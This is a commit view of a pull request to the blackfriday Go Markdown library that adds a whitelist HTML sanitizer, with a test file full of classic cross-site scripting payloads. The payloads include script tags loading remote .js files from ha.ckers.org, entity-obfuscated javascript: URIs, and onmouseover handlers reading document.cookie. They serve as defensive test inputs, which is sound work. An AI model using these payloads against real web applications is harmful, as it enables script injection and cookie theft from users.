Merge pull request #50 from rtfb/master

Better protection against JavaScript injection
This commit is contained in:
Vytautas Šaltenis 2014-03-30 19:52:13 +03:00
commit d643453f1e
5 changed files with 228 additions and 48 deletions

View File

@ -89,6 +89,11 @@ All features of upskirt are supported, including:
known inputs that make it crash. If you find one, please let me known inputs that make it crash. If you find one, please let me
know and send me the input that does it. know and send me the input that does it.
NOTE: "safety" in this context means *runtime safety only*. It is
not bulletproof against JavaScript injection, though we're working
on it (https://github.com/russross/blackfriday/issues/11 tracks the
progress).
* **Fast processing**. It is fast enough to render on-demand in * **Fast processing**. It is fast enough to render on-demand in
most web applications without having to cache the output. most web applications without having to cache the output.

150
html.go
View File

@ -18,6 +18,7 @@ package blackfriday
import ( import (
"bytes" "bytes"
"fmt" "fmt"
"regexp"
"strconv" "strconv"
"strings" "strings"
) )
@ -28,7 +29,7 @@ const (
HTML_SKIP_STYLE // skip embedded <style> elements HTML_SKIP_STYLE // skip embedded <style> elements
HTML_SKIP_IMAGES // skip embedded images HTML_SKIP_IMAGES // skip embedded images
HTML_SKIP_LINKS // skip all links HTML_SKIP_LINKS // skip all links
HTML_SKIP_SCRIPT // skip embedded <script> elements HTML_SANITIZE_OUTPUT // strip output of everything that's not known to be safe
HTML_SAFELINK // only link to trusted protocols HTML_SAFELINK // only link to trusted protocols
HTML_NOFOLLOW_LINKS // only link with rel="nofollow" HTML_NOFOLLOW_LINKS // only link with rel="nofollow"
HTML_TOC // generate a table of contents HTML_TOC // generate a table of contents
@ -41,6 +42,41 @@ const (
HTML_SMARTYPANTS_LATEX_DASHES // enable LaTeX-style dashes (with HTML_USE_SMARTYPANTS) HTML_SMARTYPANTS_LATEX_DASHES // enable LaTeX-style dashes (with HTML_USE_SMARTYPANTS)
) )
// Whitelist data consulted by sanitizeTag: a tag is kept only when it matches
// one of the regular expressions compiled below. None of the patterns sets a
// case-insensitive flag, so matching is case-sensitive.
var (
// tags lists the element names that tagWhitelist accepts as a bare opening
// or closing tag (no attributes).
tags = []string{
"b",
"blockquote",
"code",
"del",
"dd",
"dl",
"dt",
"em",
"h1",
"h2",
"h3",
"h4",
"h5",
"h6",
"i",
"kbd",
"li",
"ol",
"p",
"pre",
"s",
"sup",
"sub",
"strong",
"strike",
"ul",
}
// urlRe is a regexp fragment for the URLs allowed in href/src attributes:
// the value must begin with http://, https://, ftp:// or a single "/",
// followed by one or more characters from the listed set.
urlRe = `((https?|ftp):\/\/|\/)[-A-Za-z0-9+&@#\/%?=~_|!:,.;\(\)]+`
// tagWhitelist matches input that is exactly one opening or closing tag
// from tags, or a <br>/<hr> tag with an optional space and self-closing slash.
tagWhitelist = regexp.MustCompile(`^(<\/?(` + strings.Join(tags, "|") + `)>|<(br|hr)\s?\/?>)$`)
// anchorClean matches exactly <a href="URL"> with an optional non-empty
// title attribute, or the closing </a>.
anchorClean = regexp.MustCompile(`^(<a\shref="` + urlRe + `"(\stitle="[^"<>]+")?\s?>|<\/a>)$`)
// imgClean matches exactly <img src="URL"> followed by optional width and
// height (1-3 digits), alt and title attributes, in that order, with an
// optional self-closing slash.
imgClean = regexp.MustCompile(`^(<img\ssrc="` + urlRe + `"(\swidth="\d{1,3}")?(\sheight="\d{1,3}")?(\salt="[^"<>]*")?(\stitle="[^"<>]*")?\s?\/?>)$`)
)
// Html is a type that implements the Renderer interface for HTML output. // Html is a type that implements the Renderer interface for HTML output.
// //
// Do not create this directly, instead use the HtmlRenderer function. // Do not create this directly, instead use the HtmlRenderer function.
@ -138,6 +174,10 @@ func attrEscape(out *bytes.Buffer, src []byte) {
} }
} }
// GetFlags returns the flags value stored on this HTML renderer.
func (options *Html) GetFlags() int {
return options.flags
}
func (options *Html) Header(out *bytes.Buffer, text func() bool, level int) { func (options *Html) Header(out *bytes.Buffer, text func() bool, level int) {
marker := out.Len() marker := out.Len()
doubleSpace(out) doubleSpace(out)
@ -169,32 +209,10 @@ func (options *Html) BlockHtml(out *bytes.Buffer, text []byte) {
} }
doubleSpace(out) doubleSpace(out)
if options.flags&HTML_SKIP_SCRIPT != 0 {
out.Write(stripTag(string(text), "script", "p"))
} else {
out.Write(text) out.Write(text)
}
out.WriteByte('\n') out.WriteByte('\n')
} }
// stripTag rewrites the first opening <tag ...> element in text as <newTag>
// and replaces every closing </tag> with </newTag>.
//
// Text containing no '<' is returned unchanged. If the first '<' does not
// start an opening tag named tag (as reported by findHtmlTagPos), only the
// closing-tag replacement is applied.
func stripTag(text, tag, newTag string) []byte {
	i := strings.Index(text, "<")
	if i < 0 {
		return []byte(text)
	}

	noOpen := text
	// findHtmlTagPos is handed text[i:], so the position it reports for the
	// closing '>' is relative to i and must be shifted back before it is used
	// to slice text itself.
	if found, end := findHtmlTagPos([]byte(text[i:]), tag); found {
		noOpen = text[:i+1] + newTag + text[i+end:]
	}

	closeTag := fmt.Sprintf("</%s>", tag)
	closeNewTag := fmt.Sprintf("</%s>", newTag)
	return []byte(strings.Replace(noOpen, closeTag, closeNewTag, -1))
}
func (options *Html) HRule(out *bytes.Buffer) { func (options *Html) HRule(out *bytes.Buffer) {
doubleSpace(out) doubleSpace(out)
out.WriteString("<hr") out.WriteString("<hr")
@ -522,9 +540,6 @@ func (options *Html) RawHtmlTag(out *bytes.Buffer, text []byte) {
if options.flags&HTML_SKIP_IMAGES != 0 && isHtmlTag(text, "img") { if options.flags&HTML_SKIP_IMAGES != 0 && isHtmlTag(text, "img") {
return return
} }
if options.flags&HTML_SKIP_SCRIPT != 0 && isHtmlTag(text, "script") {
return
}
out.Write(text) out.Write(text)
} }
@ -726,6 +741,29 @@ func isHtmlTag(tag []byte, tagname string) bool {
return found return found
} }
// skipUntilCharIgnoreQuotes returns the index of the first occurrence of char
// in html, at or after start, that is not enclosed in single, double or grave
// (backtick) quotes. Quoted text is skipped because it may be an attribute
// value or JavaScript that merely contains the character.
//
// A quoted run is closed only by the same quote character that opened it, so
// a different quote character inside it (the apostrophe in title="it's") is
// treated as ordinary text rather than as the start of another quoted run.
//
// When there is no unquoted occurrence, start is returned; callers tell the
// two outcomes apart by checking that the result is greater than start.
func skipUntilCharIgnoreQuotes(html []byte, start int, char byte) int {
	var quote byte // quote character currently open, or 0 when outside quotes
	for i := start; i < len(html); i++ {
		c := html[i]
		switch {
		case quote != 0:
			// Inside quotes: only the matching quote character is significant.
			if c == quote {
				quote = 0
			}
		case c == char:
			return i
		case c == '\'' || c == '"' || c == '`':
			quote = c
		}
	}
	return start
}
func findHtmlTagPos(tag []byte, tagname string) (bool, int) { func findHtmlTagPos(tag []byte, tagname string) (bool, int) {
i := 0 i := 0
if i < len(tag) && tag[0] != '<' { if i < len(tag) && tag[0] != '<' {
@ -754,28 +792,54 @@ func findHtmlTagPos(tag []byte, tagname string) (bool, int) {
return false, -1 return false, -1
} }
// Now look for closing '>', but ignore it when it's in any kind of quotes, rightAngle := skipUntilCharIgnoreQuotes(tag, i, '>')
// it might be JavaScript if rightAngle > i {
inSingleQuote := false return true, rightAngle
inDoubleQuote := false
inGraveQuote := false
for i < len(tag) {
switch {
case tag[i] == '>' && !inSingleQuote && !inDoubleQuote && !inGraveQuote:
return true, i
case tag[i] == '\'':
inSingleQuote = !inSingleQuote
case tag[i] == '"':
inDoubleQuote = !inDoubleQuote
case tag[i] == '`':
inGraveQuote = !inGraveQuote
}
i++
} }
return false, -1 return false, -1
} }
// sanitizeHtml rebuilds html piece by piece: the text preceding each tag is
// copied through unchanged, each tag is passed through sanitizeTag, and a
// single newline is appended to the result. The loop ends once findHtmlTag
// hands back an empty remainder.
func sanitizeHtml(html []byte) []byte {
	var cleaned []byte
	for len(html) > 0 {
		text, tag, remainder := findHtmlTag(html)
		cleaned = append(cleaned, text...)
		cleaned = append(cleaned, sanitizeTag(tag)...)
		html = remainder
	}
	return append(cleaned, '\n')
}
// sanitizeTag returns tag unchanged when it matches tagWhitelist, anchorClean
// or imgClean, and an empty slice otherwise.
func sanitizeTag(tag []byte) []byte {
	switch {
	case tagWhitelist.Match(tag), anchorClean.Match(tag), imgClean.Match(tag):
		return tag
	}
	return []byte{}
}
// skipUntilChar returns the index of the first occurrence of char in text at
// or after start. If char does not occur, the position where the scan stopped
// is returned: len(text), or start itself when start is already past the end.
func skipUntilChar(text []byte, start int, char byte) int {
	pos := start
	for ; pos < len(text); pos++ {
		if text[pos] == char {
			break
		}
	}
	return pos
}
// findHtmlTag splits html around its first tag. skip is the text before the
// first '<', tag runs from that '<' through the closing '>' located by
// skipUntilCharIgnoreQuotes, and rest is everything after the tag.
//
// When no closing '>' is found after the '<' (including when html contains no
// '<' at all), all three results are empty slices.
func findHtmlTag(html []byte) (skip, tag, rest []byte) {
	open := skipUntilChar(html, 0, '<')
	closing := skipUntilCharIgnoreQuotes(html, open, '>')
	if closing <= open {
		return []byte{}, []byte{}, []byte{}
	}
	end := closing + 1
	return html[:open], html[open:end], html[end:]
}
func skipSpace(tag []byte, i int) int { func skipSpace(tag []byte, i int) int {
for i < len(tag) && isspace(tag[i]) { for i < len(tag) && isspace(tag[i]) {
i++ i++

View File

@ -90,18 +90,119 @@ func TestRawHtmlTag(t *testing.T) {
"<p>alert()</p>\n", "<p>alert()</p>\n",
"<script>alert()</script>\n", "<script>alert()</script>\n",
"<p>alert()</p>\n", "alert()\n",
"<script src='foo'></script>\n", "<script src='foo'></script>\n",
"<p></p>\n", "\n",
"<script src='a>b'></script>\n",
"\n",
"zz <script src='foo'></script>\n", "zz <script src='foo'></script>\n",
"<p>zz </p>\n", "<p>zz </p>\n",
"zz <script src=foo></script>\n", "zz <script src=foo></script>\n",
"<p>zz </p>\n", "<p>zz </p>\n",
`<script><script src="http://example.com/exploit.js"></SCRIPT></script>`,
"\n",
`'';!--"<XSS>=&{()}`,
"<p>'';!--&quot;=&amp;{()}</p>\n",
"<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>",
"<p></p>\n",
"<SCRIPT \nSRC=http://ha.ckers.org/xss.js></SCRIPT>",
"<p></p>\n",
`<IMG SRC="javascript:alert('XSS');">`,
"<p></p>\n",
"<IMG SRC=javascript:alert('XSS')>",
"<p></p>\n",
"<IMG SRC=JaVaScRiPt:alert('XSS')>",
"<p></p>\n",
"<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>",
"<p></p>\n",
`<a onmouseover="alert(document.cookie)">xss link</a>`,
"<p>xss link</a></p>\n",
"<a onmouseover=alert(document.cookie)>xss link</a>",
"<p>xss link</a></p>\n",
// XXX: this doesn't pass yet
//`<IMG """><SCRIPT>alert("XSS")</SCRIPT>">`,
//"<p></p>\n",
"<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
"<p></p>\n",
`<IMG SRC=# onmouseover="alert('xxs')">`,
"<p></p>\n",
`<IMG SRC= onmouseover="alert('xxs')">`,
"<p></p>\n",
`<IMG onmouseover="alert('xxs')">`,
"<p></p>\n",
"<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>",
"<p></p>\n",
"<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>",
"<p></p>\n",
"<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>",
"<p></p>\n",
`<IMG SRC="javascriptascript:alert('XSS');">`,
"<p></p>\n",
`<IMG SRC="jav&#x09;ascript:alert('XSS');">`,
"<p></p>\n",
`<IMG SRC="jav&#x0A;ascript:alert('XSS');">`,
"<p></p>\n",
`<IMG SRC="jav&#x0D;ascript:alert('XSS');">`,
"<p></p>\n",
`<IMG SRC=" &#14; javascript:alert('XSS');">`,
"<p></p>\n",
`<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>`,
"<p></p>\n",
// XXX: this doesn't pass yet
//"<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>",
//"\n",
`<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>`,
"<p></p>\n",
// XXX: this doesn't pass yet
//`<<SCRIPT>alert("XSS");//<</SCRIPT>`,
//"",
"<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >",
"<p></p>\n",
"<SCRIPT SRC=//ha.ckers.org/.j>",
"<p></p>\n",
// XXX: this doesn't pass yet
//`<IMG SRC="javascript:alert('XSS')"`,
//"",
// XXX: this doesn't pass yet
//"<iframe src=http://ha.ckers.org/scriptlet.html <",
//"",
} }
doTestsInlineParam(t, tests, 0, HTML_SKIP_STYLE|HTML_SKIP_SCRIPT) doTestsInlineParam(t, tests, 0, HTML_SKIP_STYLE|HTML_SANITIZE_OUTPUT)
} }
func TestEmphasis(t *testing.T) { func TestEmphasis(t *testing.T) {

View File

@ -34,6 +34,10 @@ func LatexRenderer(flags int) Renderer {
return &Latex{} return &Latex{}
} }
// GetFlags always returns 0 for the LaTeX renderer, so no flag bit tested
// against this value is ever set.
func (options *Latex) GetFlags() int {
return 0
}
// render code chunks using verbatim, or listings if we have a language // render code chunks using verbatim, or listings if we have a language
func (options *Latex) BlockCode(out *bytes.Buffer, text []byte, lang string) { func (options *Latex) BlockCode(out *bytes.Buffer, text []byte, lang string) {
if lang == "" { if lang == "" {

View File

@ -165,6 +165,8 @@ type Renderer interface {
// Header and footer // Header and footer
DocumentHeader(out *bytes.Buffer) DocumentHeader(out *bytes.Buffer)
DocumentFooter(out *bytes.Buffer) DocumentFooter(out *bytes.Buffer)
GetFlags() int
} }
// Callback functions for inline parsing. One such function is defined // Callback functions for inline parsing. One such function is defined
@ -231,7 +233,7 @@ func MarkdownCommon(input []byte) []byte {
htmlFlags |= HTML_USE_SMARTYPANTS htmlFlags |= HTML_USE_SMARTYPANTS
htmlFlags |= HTML_SMARTYPANTS_FRACTIONS htmlFlags |= HTML_SMARTYPANTS_FRACTIONS
htmlFlags |= HTML_SMARTYPANTS_LATEX_DASHES htmlFlags |= HTML_SMARTYPANTS_LATEX_DASHES
htmlFlags |= HTML_SKIP_SCRIPT htmlFlags |= HTML_SANITIZE_OUTPUT
renderer := HtmlRenderer(htmlFlags, "", "") renderer := HtmlRenderer(htmlFlags, "", "")
// set up the parser // set up the parser
@ -291,6 +293,10 @@ func Markdown(input []byte, renderer Renderer, extensions int) []byte {
first := firstPass(p, input) first := firstPass(p, input)
second := secondPass(p, first) second := secondPass(p, first)
if renderer.GetFlags()&HTML_SANITIZE_OUTPUT != 0 {
second = sanitizeHtml(second)
}
return second return second
} }